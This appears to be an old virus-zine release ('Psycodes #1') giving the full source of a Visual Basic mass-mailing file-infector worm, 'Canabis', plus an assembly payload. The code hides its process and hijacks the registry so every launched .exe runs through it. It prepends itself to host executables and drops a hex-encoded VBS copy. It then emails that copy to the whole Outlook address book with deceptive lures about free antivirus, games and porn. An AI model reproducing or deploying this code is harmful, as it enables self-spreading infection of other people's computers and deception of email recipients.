컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴
Psycodes #1
Code By : Psychologic
Email   : Psychologic@hotmail.com
Home    : http://psychologic.uni.cc
컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴
컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴
W32/I-worm.hllp.Canabis [ Exe Prepender ]
컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴

VERSION 5.00
Begin VB.Form Form1 
   Caption         =   "Canabis"
   ClientHeight    =   3090
   ClientLeft      =   60
   ClientTop       =   450
   ClientWidth     =   4680
   ControlBox      =   0   'False
   LinkTopic       =   "Form1"
   ScaleHeight     =   3090
   ScaleWidth      =   4680
   ShowInTaskbar   =   0   'False
   StartUpPosition =   2  'CenterScreen
   Visible         =   0   'False
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False

'W32/I-worm.hllp.Canabis
'By Psychologic

Private WinDir As String
Private VirusPath As String
Private VirusFile As String
Private VirusCode As String
Private VictimCode As String
Private Victim As String
Private CheckVirusMarker As String
Private VirusMarker As String
Private HostLength As Long
Private HostCode As String
Private VirusInstalled As String
Private InstallFile As String

Const VirusSize As Integer = 14848
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long

Option Explicit
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
    lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
    lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
    ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
    lpStartupInfo As STARTUPINFO, lpProcessInformation As _
    PROCESS_INFORMATION) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const INFINITE = -1&

Public Sub ExecCmd(cmdline$)
    Dim proc As PROCESS_INFORMATION
    Dim start As STARTUPINFO
    Dim ReturnValue As Integer
    start.cb = Len(start)
    ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)
    Do
    ReturnValue = WaitForSingleObject(proc.hProcess, 0)
    DoEvents
    Loop Until ReturnValue <> 258
    ReturnValue = CloseHandle(proc.hProcess)
End Sub

Private Sub Form_Load()
If Day(Now) = 1 Then
    Open "C:\Canabis.bat" For Output As #1
    Print #1, "echo e 0100  E9 E5 02 00 00 00 00 00 00 00 00 3E 7F 9F 61 1F>>info32" & vbCrLf
    Print #1, "echo e 0110  98 00 80 30 63 98 61 19 18 00 80 30 63 98 61 19>>info32" & vbCrLf
    Print #1, "echo e 0120  18 00 80 3E 7F 98 7F 99 1F 00 80 06 60 18 0C 99>>info32" & vbCrLf
    Print #1, "echo e 0130  19 00 80 06 60 18 0C 99 19 00 80 3E 60 1F 0C 9F>>info32" & vbCrLf
    Print #1, "echo e 0140  99 00 80 00 00 00 00 00 00 00 00 00 00 FE C0 3C>>info32" & vbCrLf
    Print #1, "echo e 0150  7F 00 FE 00 00 C6 C0 18 60 00 C0 00 00 C6 C0 18>>info32" & vbCrLf
    Print #1, "echo e 0160  6F 00 C0 00 00 C6 C0 18 63 00 C0 00 00 C6 C0 18>>info32" & vbCrLf
    Print #1, "echo e 0170  63 00 C0 00 00 FE FC 3C 7F 00 FE 00 00 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 0180  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 0190  00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF>>info32" & vbCrLf
    Print #1, "echo e 01A0  FF FF FF 00 80 00 00 00 00 01 00 00 80 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 01B0  00 01 00 FF FF FF FF FF FF FF FF 00 00 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 01C0  00 00 00 00 00 00 00 7C 00 00 00 01 00 FF C1 12>>info32" & vbCrLf
    Print #1, "echo e 01D0  FF 00 00 02 00 00 85 89 00 00 00 04 00 00 48 51>>info32" & vbCrLf
    Print #1, "echo e 01E0  00 00 00 04 00 00 10 21 00 00 00 02 00 F8 23 12>>info32" & vbCrLf
    Print #1, "echo e 01F0  3F 00 00 01 00 04 24 8C 40 00 00 00 00 64 C4 84>>info32" & vbCrLf
    Print #1, "echo e 0200  4C 00 00 00 00 64 44 82 4C 00 00 00 00 04 84 82>>info32" & vbCrLf
    Print #1, "echo e 0210  40 00 00 00 00 F8 83 02 3F 00 00 00 00 01 80 02>>info32" & vbCrLf
    Print #1, "echo e 0220  80 00 00 00 00 02 80 02 40 00 00 00 00 04 40 04>>info32" & vbCrLf
    Print #1, "echo e 0230  20 00 00 00 00 0F 40 04 F0 00 00 00 00 00 20 08>>info32" & vbCrLf
    Print #1, "echo e 0240  00 00 00 00 00 7F 1E E0 F9 00 00 00 00 6A 02 00>>info32" & vbCrLf
    Print #1, "echo e 0250  59 00 00 00 00 54 02 00 A9 00 00 00 00 40 02 00>>info32" & vbCrLf
    Print #1, "echo e 0260  09 00 00 00 00 7F 02 00 F9 00 00 00 00 00 01 00>>info32" & vbCrLf
    Print #1, "echo e 0270  02 00 00 00 00 FF 00 00 FC 00 00 00 00 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 0280  00 00 00 FF FF FF FF FF FF FF FF 00 80 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 0290  00 01 00 00 80 00 00 00 00 01 00 FF FF FF FF FF>>info32" & vbCrLf
    Print #1, "echo e 02A0  FF FF FF 00 00 00 00 00 00 00 00 33 60 C3 03 F3>>info32" & vbCrLf
    Print #1, "echo e 02B0  03 F0 F3 66 30 03 C2 03 03 00 13 CF 1A C3 E3 F3>>info32" & vbCrLf
    Print #1, "echo e 02C0  F3 F0 F3 98 0D 43 30 03 33 00 43 00 00 C3 03 F3>>info32" & vbCrLf
    Print #1, "echo e 02D0  33 F0 33 00 00 00 00 00 00 00 00 FF FF FF FF FF>>info32" & vbCrLf
    Print #1, "echo e 02E0  FF FF FF 00 80 00 00 00 00 01 00 FF FF FF FF FF>>info32" & vbCrLf
    Print #1, "echo e 02F0  FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00>>info32" & vbCrLf
    Print #1, "echo e 0300  00 00 00 00 00 32 00 B4 00 B0 13 CD 10 B9 00 00>>info32" & vbCrLf
    Print #1, "echo e 0310  50 53 51 52 2B DB B9 40 00 51 B9 04 00 51 B9 10>>info32" & vbCrLf
    Print #1, "echo e 0320  00 B8 00 80 50 2E 23 87 03 01 74 18 50 53 51 52>>info32" & vbCrLf
    Print #1, "echo e 0330  B4 0C 2E 8B 0E 03 03 2E 8B 16 05 03 B0 55 CD 10>>info32" & vbCrLf
    Print #1, "echo e 0340  5A 59 5B 58 58 D1 E8 2E FF 06 03 03 E2 D6 83 C3>>info32" & vbCrLf
    Print #1, "echo e 0350  02 59 E2 C9 2E FF 06 05 03 2E 83 2E 03 03 40 59>>info32" & vbCrLf
    Print #1, "echo e 0360  E2 B7 2E 83 2E 05 03 40 5A 59 5B 58 51 2B C9 E2>>info32" & vbCrLf
    Print #1, "echo e 0370  FE 59 50 53 51 52 2B DB B9 40 00 51 B9 04 00 51>>info32" & vbCrLf
    Print #1, "echo e 0380  B9 10 00 B8 00 80 50 2E 23 87 03 01 74 18 50 53>>info32" & vbCrLf
    Print #1, "echo e 0390  51 52 B4 0C 2E 8B 0E 03 03 2E 8B 16 05 03 B0 00>>info32" & vbCrLf
    Print #1, "echo e 03A0  CD 10 5A 59 5B 58 58 D1 E8 2E FF 06 03 03 E2 D6>>info32" & vbCrLf
    Print #1, "echo e 03B0  83 C3 02 59 E2 C9 2E FF 06 05 03 2E 83 2E 03 03>>info32" & vbCrLf
    Print #1, "echo e 03C0  40 59 E2 B7 2E 83 2E 05 03 40 5A 59 5B 58 2E FF>>info32" & vbCrLf
    Print #1, "echo e 03D0  06 03 03 41 81 F9 26 02 74 03 E9 33 FF B4 00 B0>>info32" & vbCrLf
    Print #1, "echo e 03E0  03 CD 10 CD 20 E9 04 02 E9 D1 00 20 20 20 20 20>>info32" & vbCrLf
    Print #1, "echo e 03F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 DA>>info32" & vbCrLf
    Print #1, "echo e 0400  C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4>>info32" & vbCrLf
    Print #1, "echo e 0410  C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 20 0D 0A 20>>info32" & vbCrLf
    Print #1, "echo e 0420  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>info32" & vbCrLf
    Print #1, "echo e 0430  20 20 20 B3 20 20 50 54 FA 41 57 49 58 FA 4D 45>>info32" & vbCrLf
    Print #1, "echo e 0440  44 49 41 FA 4B 4F 4D 50 55 54 49 4E 44 4F 20 20>>info32" & vbCrLf
    Print #1, "echo e 0450  DB 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 20>>info32" & vbCrLf
    Print #1, "echo e 0460  20 20 20 20 20 20 20 B3 5F 5F 5F 5F 5F 5F 5F 5F>>info32" & vbCrLf
    Print #1, "echo e 0470  5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F>>info32" & vbCrLf
    Print #1, "echo e 0480  5F 5F 5F 5F DB 0D 0A 20 20 20 20 20 20 20 20 20>>info32" & vbCrLf
    Print #1, "echo e 0490  20 20 20 20 20 20 20 20 20 20 20 20 DF DF DF DF>>info32" & vbCrLf
    Print #1, "echo e 04A0  DF DF DF DF DF DF DF DF DF DF DF DF DF DF DF DF>>info32" & vbCrLf
    Print #1, "echo e 04B0  DF DF DF DF DF DF DF DF DF 0D 0A 24 BF 01 01 8B>>info32" & vbCrLf
    Print #1, "echo e 04C0  15 81 C2 00 01 83 C2 06 B4 09 CD 21 BF 01 01 8B>>info32" & vbCrLf
    Print #1, "echo e 04D0  35 81 C6 00 01 BF 00 01 B9 03 00 8A 24 88 25 46>>info32" & vbCrLf
    Print #1, "echo e 04E0  47 E2 F8 BF 00 01 FF E7 00>>info32" & vbCrLf
    Print #1, "echo rcx>>info32" & vbCrLf
    Print #1, "echo 3E8>>info32" & vbCrLf
    Print #1, "echo n C:\Canabis.com>>info32" & vbCrLf
    Print #1, "echo w>>info32" & vbCrLf
    Print #1, "echo q>>info32" & vbCrLf
    Print #1, "debug < info32" & vbCrLf
    Print #1, "C:\Canabis.com" & vbCrLf
    Close #1
    Shell "C:\Canabis.bat", vbHide
End If
On Error Resume Next
Dim FFile
FFile = FreeFile
App.TaskVisible = False
Call RegisterServiceProcess(0, 1)
VirusMarker = "Canabis"
WinDir = Environ("windir")
If Right(WinDir, 1) <> "\" Then WinDir = WinDir & "\"
VirusPath = App.Path
If Right(VirusPath, 1) <> "\" Then VirusPath = VirusPath & "\"
VirusFile = App.EXEName & ".exe"
InstallFile = WinDir & "RunEXE.exe"
VirusInstalled = Dir(InstallFile, vbSystem + vbHidden)
If VirusInstalled = "" Then
    FileCopy VirusPath & VirusFile, InstallFile
    SetAttr InstallFile, vbSystem + vbHidden
    Dim Wshs
    Set Wshs = CreateObject("WScript.Shell")
    Wshs.RegWrite "HKEY_CLASSES_ROOT\exefile\shell\open\command\", InstallFile & " " & "%1 %*"
End If
If VirusFile = "RunEXE.exe" Then
    ExecCmd Command
        Victim = Replace(Command, """", "")
        Victim = GetFile(CStr(Victim))
        Open Victim For Binary Access Read As #FFile
            VictimCode = Space(LOF(FFile))
            Get #1, 1, VictimCode
        Close #FFile
       CheckVirusMarker = Right(VictimCode, 7)
       If CheckVirusMarker <> VirusMarker Then
            Open VirusPath & VirusFile For Binary Access Read As #FFile
                VirusCode = Space$(VirusSize)
                Get #1, 1, VirusCode
            Close #FFile
            Open Victim For Binary Access Write As #FFile
                Put #FFile, 1, VirusCode
                Put #FFile, VirusSize, VictimCode
                Put #FFile, LOF(FFile) + 2, VirusMarker
            Close #FFile
        End If
End
Else
Open VirusPath & VirusFile For Binary Access Read As #FFile
        HostLength = (LOF(FFile) - VirusSize)
        If HostLength > 0 Then HostCode = Space(HostLength)
        Get #FFile, VirusSize, HostCode
    Close #FFile
    Open VirusPath & App.EXEName & ".Canabis" For Binary Access Write As #FFile
         Put #FFile, , HostCode
    Close #FFile
    ExecCmd VirusPath & App.EXEName & ".Canabis" & " " & Command
    Kill (VirusPath & App.EXEName & ".Canabis")
    End
End If
Dim dconv, w As String
Dim j, Hexa, Code, TabCode, Rows, Allcode
Open VirusPath & VirusFile For Binary As #1
    dconv = Input(LOF(1), 1)
Close #1
For j = 1 To Len(dconv)
                 Hexa = Hex(Asc(Mid(dconv, j, 1)))
            If (Len(Hexa) = 1) Then Hexa = "0" & Hexa
            Code = Code & Hexa
            If (Len(Code) > 10000) Then
                ReDim Preserve TabCode(Rows + 1)
                TabCode(Rows) = Code
                Code = ""
                Rows = Rows + 1
            End If
    Next
    ReDim Preserve TabCode(Rows + 1)
    TabCode(Rows) = Code
    For j = 0 To (UBound(TabCode, 1) - 1)
        Allcode = Allcode + TabCode(j)
    Next
    w = "For i = 1 To Len(Canabis) Step 2"
    w = w & vbCrLf & "NewCode = NewCode & Chr(" & Chr(34) & "&h" & Chr(34) & "& Mid(Canabis, i, 2))"
    w = w & vbCrLf & "next"
    w = w & vbCrLf & "Set NewCanabis = fso.createtextfile(file.path, True)"
    w = w & vbCrLf & "NewCanabis.write NewCode"
    w = w & vbCrLf & "NewCanabis.close"
    w = w & vbCrLf & "end if"
    w = w & vbCrLf & "set fso = Createobject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")"
    w = w & vbCrLf & "set new = fso.createtextfile(" & Chr(34) & "C:\Canabis.exe" & Chr(34) & ",true)"
    w = w & vbCrLf & "new.write Canabis"
    w = w & vbCrLf & "new.close"
    w = w & vbCrLf & "CreateObject (" & Chr(34) & "wscript.Shell" & Chr(34) & ").run " & Chr(34) & "C:\Canabis.exe" & Chr(34) & ", 1, False"
    w = w & vbCrLf & "'W32/I-worm.Canabis By Psychologic"

Open "C:\Canabis.avi.vbs" For Output As #1
Print #1, "Canabis=" & Chr(34) & Allcode & Chr(34)
Print #1, vbCrLf & w
Close

Dim avty47g, b098uei, d000987j, fty678uy, guuythp, mes1, mes2, mes3, mes4, mes5, armen1, armen2
    mes1 = "Hi ..."
    mes1 = mes1 & vbCrLf & "This is free software that I got from"
    mes1 = mes1 & vbCrLf & "My new AntiVirus, This is very good software"
    mes1 = mes1 & vbCrLf & "It can protect every virus in the world"
    mes1 = mes1 & vbCrLf & "Just Checkout the attachment"

mes2 = "Hi ..."
mes2 = mes2 & vbCrLf & "I have new game for you"
mes2 = mes2 & vbCrLf & "I call it Canabis"
mes2 = mes2 & vbCrLf & "Maybe Now you get bored with ypur Counter strike"
mes2 = mes2 & vbCrLf & "Its new game and never released before, just check the attachment"

    mes3 = "Hi ..."
    mes3 = mes3 & vbCrLf & "I now you bored with your Winamp"
    mes3 = mes3 & vbCrLf & "See here, This is new and Cool mp3 player"
    mes3 = mes3 & vbCrLf & "Look at the attachment, and install it"
    mes3 = mes3 & vbCrLf & "I sweer It cool..!!"

mes4 = "Warning :"
mes4 = mes4 & vbCrLf & "WARNING :"
mes4 = mes4 & vbCrLf & "Too many virus is out there"
mes4 = mes4 & vbCrLf & "This is free AntiVirus Product"
mes4 = mes4 & vbCrLf & "Try it"

    mes5 = "Porn movie"
    mes5 = mes5 & vbCrLf & "Heyyy"
    mes5 = mes5 & vbCrLf & "Do you wanna see very Hot Asian porn movie ?"
    mes5 = mes5 & vbCrLf & "Just checkout this file "
    mes5 = mes5 & vbCrLf & "its free"

armen1 = Array(mes1, mes2, mes3, mes4)
armen2 = armen2(Int(Rnd * 5 + 1))

Set avty47g = CreateObject("Outlook.Application")
   Set b098uei = avty47g.getnamespace("MAPI")
   If avty47g = "Outlook" Then
    b098uei.Logon "profile", "password"
    For fty678uy = 1 To b098uei.addresslists.Count
    For d000987j = 1 To b098uei.addresslists(fty678uy).addressentries.Count
        With avty47g.createitem(100 - 100)
        Set guuythp = b098uei.addresslists(fty678uy).addressentries(d000987j)
        .Recipients.Add guuythp
        .Subject = "Hey you there..!!"
        .body = armen2
        .Attachments.Add "C:\Canabis.avi.vbs"
        .send
        End With
        guuythp = ""
    Next d000987j
    Next fty678uy
    b098uei.logoff
    End If
   
End Sub

Private Function Replace(Expresion As String, StrFind As String, StrReplace As String) As String
On Error Resume Next
Dim i As Long
For i = 1 To Len(Expresion)
    If Mid(Expresion, i, 1) Like StrFind Then Expresion = Mid(Expresion, 1, i - 1) & StrReplace & Mid(Expresion, i + 1)
Next i
    Replace = Expresion
End Function

Private Function GetFile(strFilePath As String) As String
    On Error GoTo ErrTrap
    Dim i As Long
    For i = 1 To Len(strFilePath)
        If Dir(Mid(strFilePath, 1, i)) <> "" Then
            GetFile = Mid(strFilePath, 1, i)
        If Dir(GetFile) <> "" And Right(GetFile, 1) <> "\" And Right(GetFile, 1) <> ":" Then Exit For
        End If
    Next
    Exit Function
ErrTrap:
    GetFile = ""
End Function


________________________________________________________________________________________
;******************
;.Canabis Asm Part
;.Canabis.Com
;Compile with tasm3
;******************
delay	macro
	local	ulang
	push	cx
	sub	cx,cx
ulang:	loop	ulang
	pop	cx
	endm
setcrt	macro	mode
	mov	ah,00
	mov	al,mode
	int	10h
	endm
pixel	macro	x,y,warna
	push	ax
	push	bx
	push	cx
	push	dx
	mov	ah,12
	mov	cx,x
	mov	dx,y
	mov	al,warna
	int	10h
	pop	dx
	pop	cx
	pop	bx
	pop	ax
	endm
heli	macro	gambar,warna
	local	ulang1,ulang2,ulang3,nol
	push	ax
	push	bx
	push	cx
	push	dx
	sub	bx,bx
	mov	cx,64
ulang1: push	cx
	mov	cx,4
ulang2: push	cx
	mov	cx,16
	mov	ax,1000000000000000b
ulang3: push	ax
	and	ax,gambar[bx]
	jz	nol
	pixel	posx,posy,warna
nol:	pop	ax
	shr	ax,1
	inc posx
	loop	ulang3
	add	bx,2
	pop cx
	loop ulang2
	inc posy
	sub posx,64
	pop cx
	loop ulang1
	sub posy,64
	pop dx
	pop cx
	pop bx
	pop ax
	endm

.model	small
.code
org 100h
tdata :jmp  proses
	  ;1234567890123456  1234567890123456  1234567890123456  1234567890123456
heli1	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 1
	dw 0111111100111110b,0110000110011111b,1001100000011111b,1000000000000000b ; 2
	dw 0110001100110000b,0110000110011000b,0001100000011001b,1000000000000000b ; 3
	dw 0110001100110000b,0110000110011000b,0001100000011001b,1000000000000000b ; 4
	dw 0111111100111110b,0111111110011000b,0001111110011001b,1000000000000000b ; 5
	dw 0110000000000110b,0000110000011000b,0001100110011001b,1000000000000000b ; 6
	dw 0110000000000110b,0000110000011000b,0001100110011001b,1000000000000000b ; 7
	dw 0110000000111110b,0000110000011111b,1001100110011111b,1000000000000000b ; 8
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 9
	dw 0000000000000000b,1100000011111110b,0111111100111100b,1111111000000000b ; 0
	dw 0000000000000000b,1100000011000110b,0110000000011000b,1100000000000000b ; 1
	dw 0000000000000000b,1100000011000110b,0110111100011000b,1100000000000000b ; 2
	dw 0000000000000000b,1100000011000110b,0110001100011000b,1100000000000000b ; 3
	dw 0000000000000000b,1100000011000110b,0110001100011000b,1100000000000000b ; 4
	dw 0000000000000000b,1111110011111110b,0111111100111100b,1111111000000000b ; 5
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 6
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 7
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 8
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 9
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 0
	dw 1000000000000000b,0000000000000000b,0000000000000000b,0000000000000001b ; 1
	dw 1000000000000000b,0000000000000000b,0000000000000000b,0000000000000001b ; 2
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 3
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 4
	dw 0000000000000000b,0000000000000000b,0000000001111100b,0000000000000000b ; 5
	dw 0000000000000001b,1100000111111111b,1111111100010010b,0000000000000000b ; 6
	dw 0000000000000010b,1000010100000000b,0000000010001001b,0000000000000000b ; 7
	dw 0000000000000100b,0100100000000000b,0000000001010001b,0000000000000000b ; 8
	dw 0000000000000100b,0001000000000000b,0000000000100001b,0000000000000000b ; 9
	dw 0000000000000010b,0010001111111000b,0011111100010010b,0000000000000000b ; 0
	dw 0000000000000001b,0010010000000100b,0100000010001100b,0000000000000000b ; 1
	dw 0000000000000000b,1100010001100100b,0100110010000100b,0000000000000000b ; 2
	dw 0000000000000000b,0100010001100100b,0100110010000010b,0000000000000000b ; 3
	dw 0000000000000000b,1000010000000100b,0100000010000010b,0000000000000000b ; 4
	dw 0000000000000000b,1000001111111000b,0011111100000010b,0000000000000000b ; 5
	dw 0000000000000000b,1000000000000001b,1000000000000010b,0000000000000000b ; 6
	dw 0000000000000000b,1000000000000010b,0100000000000010b,0000000000000000b ; 7
	dw 0000000000000000b,0100000000000100b,0010000000000100b,0000000000000000b ; 8
	dw 0000000000000000b,0100000000001111b,1111000000000100b,0000000000000000b ; 9
	dw 0000000000000000b,0010000000000000b,0000000000001000b,0000000000000000b ; 0
	dw 0000000000000000b,0001111001111111b,1111100111100000b,0000000000000000b ; 1
        dw 0000000000000000b,0000001001101010b,0101100100000000b,0000000000000000b ; 2
        dw 0000000000000000b,0000001001010100b,1010100100000000b,0000000000000000b ; 3
	dw 0000000000000000b,0000001001000000b,0000100100000000b,0000000000000000b ; 4
	dw 0000000000000000b,0000001001111111b,1111100100000000b,0000000000000000b ; 5
        dw 0000000000000000b,0000000100000000b,0000001000000000b,0000000000000000b ; 6
	dw 0000000000000000b,0000000011111111b,1111110000000000b,0000000000000000b ; 7
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 8
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 9
	dw 1000000000000000b,0000000000000000b,0000000000000000b,0000000000000001b ; 0
	dw 1000000000000000b,0000000000000000b,0000000000000000b,0000000000000001b ; 1
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 2
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 3
	dw 0110000000110011b,0000001111000011b,0000001111110011b,1111001111110000b ; 4
	dw 0011000001100110b,1100001000000011b,0000001100000011b,0001001100000000b ; 5
	dw 0001101011001111b,1110001111000011b,1111001111110011b,1111001111110000b ; 6
	dw 0000110110011000b,0011000001000011b,0011001100000011b,0100001100000000b ; 7
	dw 0000000000000000b,0000001111000011b,0011001111110011b,0011001111110000b ; 8
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 9
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 0
	dw 1000000000000000b,0000000000000000b,0000000000000000b,0000000000000001b ; 1
	dw 1111111111111111b,1111111111111111b,1111111111111111b,1111111111111111b ; 2
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 3
	dw 0000000000000000b,0000000000000000b,0000000000000000b,0000000000000000b ; 4
	

posx	dw 00
posy	dw 50

proses: setcrt 13h
	mov cx,0
ulang:  heli heli1,85
	delay
	heli heli1,00
	inc posx
	inc cx
        cmp cx,550
	je exit
	jmp ulang
exit:	setcrt 03h
	int 20h
end	tdata
